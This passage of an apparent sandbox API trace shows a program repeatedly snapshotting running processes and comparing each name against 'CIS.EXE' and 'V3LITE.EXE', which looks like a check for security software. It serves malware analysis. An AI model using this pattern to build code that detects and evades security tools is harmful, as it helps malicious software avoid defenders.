th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0163.253] lstrcpyW (in: lpString1=0x18f6dc, lpString2="PING.EXE" | out: lpString1="PING.EXE") returned="PING.EXE" [0163.253] lstrlenW (lpString="PING.EXE") returned 8 [0163.253] CharUpperBuffW (in: lpsz="PING.EXE", cchLength=0x8 | out: lpsz="PING.EXE") returned 0x8 [0163.253] lstrcmpW (lpString1="PING.EXE", lpString2="CIS.EXE") returned 1 [0163.253] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 0 [0163.254] CloseHandle (hObject=0xe0) returned 1 [0163.254] 
CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe0 [0163.256] lstrcpyW (in: lpString1=0x18f8e4, lpString2="V3LITE.EXE" | out: lpString1="V3LITE.EXE") returned="V3LITE.EXE" [0163.256] lstrlenW (lpString="V3LITE.EXE") returned 10 [0163.256] CharUpperBuffW (in: lpsz="V3LITE.EXE", cchLength=0xa | out: lpsz="V3LITE.EXE") returned 0xa [0163.256] Process32FirstW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.257] lstrcpyW (in: lpString1=0x18f6dc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0163.257] lstrlenW (lpString="[System Process]") returned 16 [0163.257] CharUpperBuffW (in: lpsz="[System Process]", cchLength=0x10 | out: lpsz="[SYSTEM PROCESS]") returned 0x10 [0163.257] lstrcmpW (lpString1="[SYSTEM PROCESS]", lpString2="V3LITE.EXE") returned -1 [0163.257] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0163.257] lstrcpyW (in: lpString1=0x18f6dc, lpString2="System" | out: lpString1="System") returned="System" [0163.257] lstrlenW (lpString="System") returned 6 [0163.257] CharUpperBuffW (in: lpsz="System", cchLength=0x6 | out: lpsz="SYSTEM") returned 0x6 [0163.257] lstrcmpW (lpString1="SYSTEM", lpString2="V3LITE.EXE") returned -1 [0163.257] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0163.258] lstrcpyW (in: lpString1=0x18f6dc, lpString2="smss.exe" | 
out: lpString1="smss.exe") returned="smss.exe" [0163.258] lstrlenW (lpString="smss.exe") returned 8 [0163.258] CharUpperBuffW (in: lpsz="smss.exe", cchLength=0x8 | out: lpsz="SMSS.EXE") returned 0x8 [0163.258] lstrcmpW (lpString1="SMSS.EXE", lpString2="V3LITE.EXE") returned -1 [0163.258] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.259] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0163.259] lstrlenW (lpString="csrss.exe") returned 9 [0163.259] CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0163.259] lstrcmpW (lpString1="CSRSS.EXE", lpString2="V3LITE.EXE") returned -1 [0163.259] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0163.259] lstrcpyW (in: lpString1=0x18f6dc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0163.260] lstrlenW (lpString="wininit.exe") returned 11 [0163.260] CharUpperBuffW (in: lpsz="wininit.exe", cchLength=0xb | out: lpsz="WININIT.EXE") returned 0xb [0163.260] lstrcmpW (lpString1="WININIT.EXE", lpString2="V3LITE.EXE") returned 1 [0163.260] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.260] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0163.260] lstrlenW 
(lpString="csrss.exe") returned 9 [0163.260] CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0163.260] lstrcmpW (lpString1="CSRSS.EXE", lpString2="V3LITE.EXE") returned -1 [0163.260] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0163.261] lstrcpyW (in: lpString1=0x18f6dc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0163.261] lstrlenW (lpString="winlogon.exe") returned 12 [0163.261] CharUpperBuffW (in: lpsz="winlogon.exe", cchLength=0xc | out: lpsz="WINLOGON.EXE") returned 0xc [0163.261] lstrcmpW (lpString1="WINLOGON.EXE", lpString2="V3LITE.EXE") returned 1 [0163.261] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0163.262] lstrcpyW (in: lpString1=0x18f6dc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0163.262] lstrlenW (lpString="services.exe") returned 12 [0163.262] CharUpperBuffW (in: lpsz="services.exe", cchLength=0xc | out: lpsz="SERVICES.EXE") returned 0xc [0163.262] lstrcmpW (lpString1="SERVICES.EXE", lpString2="V3LITE.EXE") returned -1 [0163.262] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0163.262] lstrcpyW (in: lpString1=0x18f6dc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0163.262] lstrlenW (lpString="lsass.exe") returned 9 [0163.262] 
CharUpperBuffW (in: lpsz="lsass.exe", cchLength=0x9 | out: lpsz="LSASS.EXE") returned 0x9 [0163.262] lstrcmpW (lpString1="LSASS.EXE", lpString2="V3LITE.EXE") returned -1 [0163.262] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0163.263] lstrcpyW (in: lpString1=0x18f6dc, lpString2="lsm.exe" | out: lpString1="lsm.exe") returned="lsm.exe" [0163.263] lstrlenW (lpString="lsm.exe") returned 7 [0163.263] CharUpperBuffW (in: lpsz="lsm.exe", cchLength=0x7 | out: lpsz="LSM.EXE") returned 0x7 [0163.263] lstrcmpW (lpString1="LSM.EXE", lpString2="V3LITE.EXE") returned -1 [0163.263] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.264] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.264] lstrlenW (lpString="svchost.exe") returned 11 [0163.264] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.264] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3LITE.EXE") returned -1 [0163.264] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.265] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.265] lstrlenW (lpString="svchost.exe") returned 11 [0163.265] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") 
returned 0xb [0163.265] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3LITE.EXE") returned -1 [0163.265] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.265] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.265] lstrlenW (lpString="svchost.exe") returned 11 [0163.265] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.265] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3LITE.EXE") returned -1 [0163.265] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.266] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.266] lstrlenW (lpString="svchost.exe") returned 11 [0163.266] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.266] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3LITE.EXE") returned -1 [0163.266] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.267] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.267] lstrlenW (lpString="svchost.exe") returned 11 [0163.267] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.267] lstrcmpW 
(lpString1="SVCHOST.EXE", lpString2="V3LITE.EXE") returned -1 [0163.267] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0163.268] lstrcpyW (in: lpString1=0x18f6dc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0163.268] lstrlenW (lpString="audiodg.exe") returned 11 [0163.268] CharUpperBuffW (in: lpsz="audiodg.exe", cchLength=0xb | out: lpsz="AUDIODG.EXE") returned 0xb [0163.268] lstrcmpW (lpString1="AUDIODG.EXE", lpString2="V3LITE.EXE") returned -1 [0163.268] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.268] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.268] lstrlenW (lpString="svchost.exe") returned 11 [0163.268] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.268] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3LITE.EXE") returned -1 [0163.269] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.269] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.269] lstrlenW (lpString="svchost.exe") returned 11 [0163.269] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.269] lstrcmpW (lpString1="SVCHOST.EXE", 
lpString2="V3LITE.EXE") returned -1 [0163.269] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x410, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0163.270] lstrcpyW (in: lpString1=0x18f6dc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0163.270] lstrlenW (lpString="spoolsv.exe") returned 11 [0163.270] CharUpperBuffW (in: lpsz="spoolsv.exe", cchLength=0xb | out: lpsz="SPOOLSV.EXE") returned 0xb [0163.270] lstrcmpW (lpString1="SPOOLSV.EXE", lpString2="V3LITE.EXE") returned -1 [0163.270] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.271] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.271] lstrlenW (lpString="svchost.exe") returned 11 [0163.271] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.271] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3LITE.EXE") returned -1 [0163.271] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0163.271] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0163.271] lstrlenW (lpString="taskhost.exe") returned 12 [0163.271] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: lpsz="TASKHOST.EXE") returned 0xc [0163.272] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="V3LITE.EXE") returned 
-1 [0163.272] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0163.272] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0163.272] lstrlenW (lpString="taskeng.exe") returned 11 [0163.272] CharUpperBuffW (in: lpsz="taskeng.exe", cchLength=0xb | out: lpsz="TASKENG.EXE") returned 0xb [0163.272] lstrcmpW (lpString1="TASKENG.EXE", lpString2="V3LITE.EXE") returned -1 [0163.272] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0163.273] lstrcpyW (in: lpString1=0x18f6dc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0163.273] lstrlenW (lpString="dwm.exe") returned 7 [0163.273] CharUpperBuffW (in: lpsz="dwm.exe", cchLength=0x7 | out: lpsz="DWM.EXE") returned 0x7 [0163.273] lstrcmpW (lpString1="DWM.EXE", lpString2="V3LITE.EXE") returned -1 [0163.273] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x658, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0163.274] lstrcpyW (in: lpString1=0x18f6dc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0163.274] lstrlenW (lpString="explorer.exe") returned 12 [0163.274] CharUpperBuffW (in: lpsz="explorer.exe", cchLength=0xc | out: lpsz="EXPLORER.EXE") returned 0xc [0163.274] lstrcmpW (lpString1="EXPLORER.EXE", lpString2="V3LITE.EXE") returned -1 [0163.274] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | 
out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0163.274] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0163.274] lstrlenW (lpString="taskeng.exe") returned 11 [0163.274] CharUpperBuffW (in: lpsz="taskeng.exe", cchLength=0xb | out: lpsz="TASKENG.EXE") returned 0xb [0163.274] lstrcmpW (lpString1="TASKENG.EXE", lpString2="V3LITE.EXE") returned -1 [0163.274] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="MSOSYNC.EXE")) returned 1 [0163.275] lstrcpyW (in: lpString1=0x18f6dc, lpString2="MSOSYNC.EXE" | out: lpString1="MSOSYNC.EXE") returned="MSOSYNC.EXE" [0163.275] lstrlenW (lpString="MSOSYNC.EXE") returned 11 [0163.275] CharUpperBuffW (in: lpsz="MSOSYNC.EXE", cchLength=0xb | out: lpsz="MSOSYNC.EXE") returned 0xb [0163.275] lstrcmpW (lpString1="MSOSYNC.EXE", lpString2="V3LITE.EXE") returned -1 [0163.275] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0163.276] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0163.276] lstrlenW (lpString="taskhost.exe") returned 12 [0163.276] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: lpsz="TASKHOST.EXE") returned 0xc [0163.276] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="V3LITE.EXE") returned -1 [0163.276] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="calls ccd copyright.exe")) returned 1 [0163.277] lstrcpyW (in: lpString1=0x18f6dc, lpString2="calls ccd copyright.exe" | out: lpString1="calls ccd copyright.exe") returned="calls ccd copyright.exe" [0163.277] lstrlenW (lpString="calls ccd copyright.exe") returned 23 [0163.277] CharUpperBuffW (in: lpsz="calls ccd copyright.exe", cchLength=0x17 | out: lpsz="CALLS CCD COPYRIGHT.EXE") returned 0x17 [0163.277] lstrcmpW (lpString1="CALLS CCD COPYRIGHT.EXE", lpString2="V3LITE.EXE") returned -1 [0163.277] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="tri.exe")) returned 1 [0163.277] lstrcpyW (in: lpString1=0x18f6dc, lpString2="tri.exe" | out: lpString1="tri.exe") returned="tri.exe" [0163.277] lstrlenW (lpString="tri.exe") returned 7 [0163.277] CharUpperBuffW (in: lpsz="tri.exe", cchLength=0x7 | out: lpsz="TRI.EXE") returned 0x7 [0163.277] lstrcmpW (lpString1="TRI.EXE", lpString2="V3LITE.EXE") returned -1 [0163.277] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x73c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="navigation-jay.exe")) returned 1 [0163.278] lstrcpyW (in: lpString1=0x18f6dc, lpString2="navigation-jay.exe" | out: lpString1="navigation-jay.exe") returned="navigation-jay.exe" [0163.278] lstrlenW (lpString="navigation-jay.exe") returned 18 [0163.278] CharUpperBuffW (in: lpsz="navigation-jay.exe", cchLength=0x12 | out: lpsz="NAVIGATION-JAY.EXE") returned 0x12 [0163.278] lstrcmpW (lpString1="NAVIGATION-JAY.EXE", lpString2="V3LITE.EXE") returned -1 [0163.278] 
Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="chevrolet-play-mel.exe")) returned 1 [0163.279] lstrcpyW (in: lpString1=0x18f6dc, lpString2="chevrolet-play-mel.exe" | out: lpString1="chevrolet-play-mel.exe") returned="chevrolet-play-mel.exe" [0163.279] lstrlenW (lpString="chevrolet-play-mel.exe") returned 22 [0163.279] CharUpperBuffW (in: lpsz="chevrolet-play-mel.exe", cchLength=0x16 | out: lpsz="CHEVROLET-PLAY-MEL.EXE") returned 0x16 [0163.279] lstrcmpW (lpString1="CHEVROLET-PLAY-MEL.EXE", lpString2="V3LITE.EXE") returned -1 [0163.279] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="clause_swaziland_complimentary.exe")) returned 1 [0163.280] lstrcpyW (in: lpString1=0x18f6dc, lpString2="clause_swaziland_complimentary.exe" | out: lpString1="clause_swaziland_complimentary.exe") returned="clause_swaziland_complimentary.exe" [0163.280] lstrlenW (lpString="clause_swaziland_complimentary.exe") returned 34 [0163.280] CharUpperBuffW (in: lpsz="clause_swaziland_complimentary.exe", cchLength=0x22 | out: lpsz="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE") returned 0x22 [0163.280] lstrcmpW (lpString1="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE", lpString2="V3LITE.EXE") returned -1 [0163.280] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="ship-loans.exe")) returned 1 [0163.280] lstrcpyW (in: lpString1=0x18f6dc, lpString2="ship-loans.exe" | out: lpString1="ship-loans.exe") returned="ship-loans.exe" [0163.280] 
lstrlenW (lpString="ship-loans.exe") returned 14 [0163.280] CharUpperBuffW (in: lpsz="ship-loans.exe", cchLength=0xe | out: lpsz="SHIP-LOANS.EXE") returned 0xe [0163.281] lstrcmpW (lpString1="SHIP-LOANS.EXE", lpString2="V3LITE.EXE") returned -1 [0163.281] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="isolation.exe")) returned 1 [0163.281] lstrcpyW (in: lpString1=0x18f6dc, lpString2="isolation.exe" | out: lpString1="isolation.exe") returned="isolation.exe" [0163.281] lstrlenW (lpString="isolation.exe") returned 13 [0163.281] CharUpperBuffW (in: lpsz="isolation.exe", cchLength=0xd | out: lpsz="ISOLATION.EXE") returned 0xd [0163.281] lstrcmpW (lpString1="ISOLATION.EXE", lpString2="V3LITE.EXE") returned -1 [0163.281] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="abc.exe")) returned 1 [0163.283] lstrcpyW (in: lpString1=0x18f6dc, lpString2="abc.exe" | out: lpString1="abc.exe") returned="abc.exe" [0163.283] lstrlenW (lpString="abc.exe") returned 7 [0163.283] CharUpperBuffW (in: lpsz="abc.exe", cchLength=0x7 | out: lpsz="ABC.EXE") returned 0x7 [0163.283] lstrcmpW (lpString1="ABC.EXE", lpString2="V3LITE.EXE") returned -1 [0163.283] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="previous_automation_previously.exe")) returned 1 [0163.284] lstrcpyW (in: lpString1=0x18f6dc, lpString2="previous_automation_previously.exe" | out: lpString1="previous_automation_previously.exe") 
